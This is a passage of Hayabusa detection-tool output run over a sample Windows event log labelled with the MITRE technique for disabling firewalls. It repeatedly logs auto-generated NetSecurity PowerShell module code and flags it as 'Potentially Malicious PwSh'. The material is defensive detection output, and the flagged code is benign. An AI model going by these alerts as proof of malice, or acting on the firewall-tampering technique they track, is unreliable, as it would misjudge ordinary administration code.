($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, 